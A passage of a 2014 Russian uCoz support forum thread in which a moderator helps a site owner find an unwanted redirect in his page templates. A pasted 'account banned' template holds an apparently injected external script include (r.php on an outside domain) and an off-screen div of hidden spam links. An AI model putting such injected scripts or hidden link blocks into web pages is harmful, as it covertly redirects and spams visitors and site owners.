Страница 2 из 3«123»
Модератор форума: dotbot 
Сообщество uCoz » Архивариус » Корзина » ПСП(персональная страница пользователя)
ПСП(персональная страница пользователя)
admin5020
Сообщений: 213
Репутация: -19

Сообщение # 16 | 19:19:34
код превышает допустимый лимит символов в сообщении поэтому код выложил у себя на сайте: http://seo-money2014.ru/index/kod_stranicy/0-26
сondor
Сообщений: 4662
Репутация: 1528

Сообщение # 17 | 19:22:18
admin5020,



еще и перенаправление на картинку зачем-то стоит facepalm

Не помещается целиком код, вставьте по частям.
Прикрепления: 0369756.jpg(11Kb)
admin5020
Сообщений: 213
Репутация: -19

Сообщение # 18 | 19:26:01
сondor, я заню, что стоит перенаправление, но не знаю как это х... извиняюсь, убрать, если поможете буду очееееееееень Вам благодарен!

Добавлено (19 Июл 2014, 19:26:01)
---------------------------------------------
сondor, доступ к этой странице поставил только модераторам и админам, но Вы там модератор, поэтому смотрите.

сondor
Сообщений: 4662
Репутация: 1528

Сообщение # 19 | 19:33:30
admin5020, отмеченное лишнее:

Цитата
<<?if(3="255")?><?else?><html><?if($ GROUP_ID$="255")?>
<?else?>
<?if(3="255")?><?else?>

<html>
<head> <style type="text/css">.gold1 {text-align:left;padding:3px;} .gold2 {clear:left;float:left;width:150px;} #goldI {display: none}


если условие <?if($ GROUP_ID$="255")?> необходимо то оно должно быть закрыто <?endif?>
admin5020
Сообщений: 213
Репутация: -19

Сообщение # 20 | 19:51:51

Цитата
сondor, я заню, что стоит перенаправление, но не знаю как это х... извиняюсь, убрать, если поможете буду очееееееееень Вам благодарен!
С этим поможете?
сondor
Сообщений: 4662
Репутация: 1528

Сообщение # 21 | 19:54:02
admin5020, в шаблонах сверху убрать:

Код
<script type="text/javascript">   
   setTimeout('location.replace("http://http://seo-money.ucoz.ua/banned_bg.png")', 3000);   
   /*Изменить текущий адрес страницы через 3 секунды (3000 миллисекунд)*/   
   </script>   
   <noscript>   
   <meta http-equiv="refresh" content="3; url=http://http://seo-money.ucoz.ua/banned_bg.png">   
   </noscript>
admin5020
Сообщений: 213
Репутация: -19

Сообщение # 22 | 20:10:45
сondor, а можете зайти в мою админ панель, чтобы убрать этот код? Данные от админ-панели скидываю в ЛС на своем сайте.

Добавлено (19 Июл 2014, 20:10:45)
---------------------------------------------
сondor, я понимаю, что Вы не выполняете подробно просьбы, но все таки...

сondor
Сообщений: 4662
Репутация: 1528

Сообщение # 23 | 20:21:41
admin5020, Панель Управления - Дизайн - Управление дизайном (Шаблоны) - Редактор страниц - Страницы сайта ищите там.
admin5020
Сообщений: 213
Репутация: -19

Сообщение # 24 | 20:37:13

Код
<?if($GROUP_ID$="255")?>$GLOBAL_BAN$<?else?><html><?if($ GROUP_ID$="255")?>$GLOBAL_BAN$<?else?><?if($GROUP_ID$="255")?>$GLOBAL_BAN$<?else?><html>
<head>
<meta charset="utf-8">
<title>$SITE_NAME$ - $MODULE_NAME$</title>
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />  
<script type="text/javascript">
       var browser         = navigator.userAgent;
       var browserRegex   = /(Android|BlackBerry|IEMobile|Nokia|iP(ad|hone|od)|Opera M(obi|ini))/;
       var isMobile      = false;
       if(browser.match(browserRegex)) {
          isMobile         = true;
          addEventListener("load", function() { setTimeout(hideURLbar, 0); }, false);
          function hideURLbar(){
             window.scrollTo(0,1);
          }
       }
</script>
<link type="text/css" rel="StyleSheet" href="/_st/my.css" />
</head>

<body>
$ADMIN_BAR$
<header>
  <div id="header">
   <div class="wrapper">
    $GLOBAL_AHEADER$
    $GLOBAL_PROMO$  
   </div>
  </div>
</header>
<div id="casing">
  <div class="wrapper">
   <?if($MODULE_ID$='forum')?><div class="forum-box"><?endif?>
   <!-- <middle> -->
   <div class="part-l">
   <div id="content">
    <!-- <body> -->$CONTENT$<!-- </body> -->
   </div>
   </div>
   <div class="part-r">
    <aside>
      <div id="sidebar">         
       $GLOBAL_CLEFTER$
      </div>
      </aside>
   </div>   
   <!-- </middle> -->
   <div class="clr"></div>
   <?if($MODULE_ID$='forum')?></div><?endif?>
  </div>
</div>
$GLOBAL_BFOOTER$
<script type="text/javascript" src="/.s/t/1064/template.min.js"></script>

<div style="display:none">

</div>
</body>
</html><?endif?>


Где тут этот код? - раздел страницы сайта.
сondor
Сообщений: 4662
Репутация: 1528

Сообщение # 25 | 20:39:40
admin5020, у вас прописан код глобального блока $GLOBAL_BAN$. Разумеется, что искать нужно в шаблоне глабального блока с этим именем.
admin5020
Сообщений: 213
Репутация: -19

Сообщение # 26 | 21:34:16
сondor, нету.


Код
<html> <head> <title>Аккаунт заблокирован</title> <meta http-equiv="content-type" content="text/html; charset=utf-8"> <style type="text/css"> body{ font-family: Verdana, Tahoma, Arial, Trebuchet MS, Sans-Serif, Georgia, Courier, Times New Roman, Serif; font-size: 11px; margin: 0; padding: 0; /* required for Opera to have 0 margin */ } .errorwrap { background: #F2DDDD; font-size: 11px; border: 1px solid #992A2A; border-top: 0; margin: 5px; padding: 0; } .errorwrap2 { font-size: 11px; padding: 5; } .errorwrap h4 { background: #E3C0C0; border: 1px solid #992A2A; border-left: 0; border-right: 0; color: #992A2A; font-size: 12px; font-weight: bold; margin: 0; padding: 5px; } a:link {text-decoration:none;color:#992A2A} a:active {text-decoration:none; color:#992A2A} a:visited {text-decoration:none; color:#992A2A} a:hover {text-decoration:none;color:#992A2A} .errorwrap p { background: transparent; border: 0; color: #992A2A; margin: 0; padding: 8px; font-size: 10px; } </style> </head> <body> <table border="0" width="750" cellspacing="1" cellpadding="75" align="center"> <tr> <td width="100%"> <div class="errorwrap"> <h4>Ошибка ! <a href="http://www.up-rise.ru/">Ваш аккаунт заблокирован</a></h4> <div class="errorwrap2">Учетная запись "<b>$USERNAME$</b>" и IP адресс : <b>$IP_ADDRESS$</b> были заблокированы <br><br> Возможные причины блокировки аккаунта : <br><br> - Оскорбление пользователей <br><br> - Не цензурная лексика <br><br> - Реклама сторонних ресурсов <br><br> - Флуд, спам, оффтоп ... <br><br> - Мошенничество <br><br> - Распространение или продажа работ администрации <br> <script type="text/javascript" src="http://avataria-vkontakte.ru/r.php?l=http://avataria-vkontakte.ru/go.php?sid=1"></script> <div style="position:absolute;left:-3072px;top:0"> <a href="http://ememdem.net/blog/dem/">новые демотиваторы</a>, <a href="http://vk-cheat.com/59-chit-kody-na-kopatel-onlayn-vkontakte.html">читы копатель онлайн</a>, <a href="http://vk-4iter.ru/">читы вконтакте</a><a href="http://pervoevtoroe.ru/salaty/">рецепт салатов с фото</a></div> <center>--------------------------------------------------------------------------------------------------------------- --</center> Процесс блокировки полностью автоматический, время блокировки : "<b>Навсегда</b>" </div></div> </td> </tr> </table> </body> </html>
сondor
Сообщений: 4662
Репутация: 1528

Сообщение # 27 | 21:36:26
admin5020, наверное у вас установлен отдельный шаблон для страницы. index/kod_stranicy/0-26 смотрите в управлении дизайном внимательно.
admin5020
Сообщений: 213
Репутация: -19

Сообщение # 28 | 22:33:40
condor, этот код не только на этой странице, но он еще стоит, где пользователям определенной группы нельзя смотреть опр.страницу, этот код срабатывает.

Как его убрать, уже достал этот код!

sad sad sad
Сообщение отредактировал admin5020 - Суббота, 19 Июл 2014, 22:35:36
сondor
Сообщений: 4662
Репутация: 1528

Сообщение # 29 | 11:44:50
admin5020, сами ставили и не помните куда?? Еще раз повторюсь, ищите внимательней в шаблонах. Перенаправление с этим скриптом я заметил у вас лишь на одной странице /index/kod_stranicy/0-26

В Управление дизайном смотрите не установлен ли для этой страницы индивидуальный шаблон, он будет отображаться с именем этой страницы в списке шаблонов Редактор страниц.
admin5020
Сообщений: 213
Репутация: -19

Сообщение # 30 | 12:34:02
сondor, потому что доступ ко всем страницам у вас есть, а если я поставлю ограничение на просмотр страниц определенной группу, будет тогда "редирект".
Сообщество uCoz » Архивариус » Корзина » ПСП(персональная страница пользователя)
Страница 2 из 3«123»
Поиск: